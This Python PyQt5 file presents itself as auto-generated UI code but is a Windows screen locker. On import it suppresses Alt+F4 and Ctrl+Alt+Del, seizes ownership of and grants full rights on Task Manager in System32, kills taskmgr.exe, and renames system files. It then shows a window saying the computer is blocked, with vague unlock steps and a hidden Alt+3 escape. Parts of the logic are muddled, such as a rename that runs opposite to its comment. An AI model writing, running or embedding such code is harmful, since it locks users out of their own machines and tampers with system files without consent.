# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file 'shutdown_ui.ui'
#
# Created by: PyQt5 UI code generator 5.15.9
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again.  Do not edit this file unless you know what you are doing.
import keyboard
from PyQt5 import QtCore, QtGui, QtWidgets
GfHkKM = "1234"
subres = True
keyboard.add_hotkey("alt + f4", lambda: None, suppress =subres)
keyboard.add_hotkey("alt + 3", lambda: rename())
keyboard.add_hotkey("ctrl + alt + del", lambda: None, suppress =True)
import os
path1 = "C:\Windows\System32\Taskmgr.exe"
path2 = "C:\Windows\System32\Taskmgr1.exe"

os.system("takeown /f C:\Windows\System32\Taskmgr.exe")
os.system("icacls C:\Windows\System32\Taskmgr.exe /grant Администраторы:F /c /l")
os.system("icacls C:\Windows\System32\Taskmgr.exe /grant Пользователи:F /c /l") # убиваем диспетчер задач если он запущен

os.system("taskkill /im taskmgr.exe") # убиваем диспетчер задач если он запущен
os.rename(path2, path1) #перименовываем файл чтобы система не могла его найти
developer_percent = 14

def rename():
    os.rename(path2, path1)
    quit()

class Ui_MainWindow(object):
    def setupUi(self, MainWindow):
        MainWindow.setObjectName("MainWindow")
        MainWindow.setWindowFlags(MainWindow.windowFlags() & ~QtCore.Qt.WindowCloseButtonHint)
        MainWindow.resize(610, 546)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.label = QtWidgets.QLabel(self.centralwidget)
        self.label.setGeometry(QtCore.QRect(0, 10, 601, 111))
        font = QtGui.QFont()
        font.setPointSize(12)
        self.label.setFont(font)
        self.label.setCursor(QtGui.QCursor(QtCore.Qt.ForbiddenCursor))
        self.label.setAlignment(QtCore.Qt.AlignCenter)
        self.label.setObjectName("label")
        self.label_2 = QtWidgets.QLabel(self.centralwidget)
        self.label_2.setGeometry(QtCore.QRect(10, 100, 521, 101))
        self.label_2.setAlignment(QtCore.Qt.AlignCenter)
        self.label_2.setObjectName("label_2")
        self.label_3 = QtWidgets.QLabel(self.centralwidget)
        self.label_3.setGeometry(QtCore.QRect(10, 170, 521, 51))
        self.label_3.setAlignment(QtCore.Qt.AlignCenter)
        self.label_3.setObjectName("label_3")
        self.progressBar = QtWidgets.QProgressBar(self.centralwidget)
        self.progressBar.setGeometry(QtCore.QRect(80, 420, 381, 41))
        self.progressBar.setProperty("value", 24)
        self.progressBar.setObjectName("progressBar")
        self.pushButton = QtWidgets.QPushButton(self.centralwidget)
        self.pushButton.setGeometry(QtCore.QRect(170, 360, 211, 41))
        self.pushButton.setObjectName("pushButton")
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtWidgets.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 610, 26))
        self.menubar.setObjectName("menubar")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)

        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "Blocked"))
        self.label.setText(_translate("MainWindow", "Your computer are blocked"))
        self.label_2.setText(_translate("MainWindow", "1) To unblock you need to mgadmin rights"))
        self.label_3.setText(_translate("MainWindow", "2) To unblock you need to get SPP setted in Atutum Battery Manager"))
        self.pushButton.setText(_translate("MainWindow", "Open Atutum Battery Manager"))

    def Enter(self):
        while developer_percent != 14:
            print(1)
            if developer_percent == 14:
                print(2)
                app.quit()
                exit()
                quit()
        self.pushButton.clicked.connect(self.reload)

    def reload(self):
        os.rename(path2, path1)
        sys.exit(app.exec_())
        app.quit()
        exit()
        quit()




if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    MainWindow.show()

    sys.exit(app.exec_())
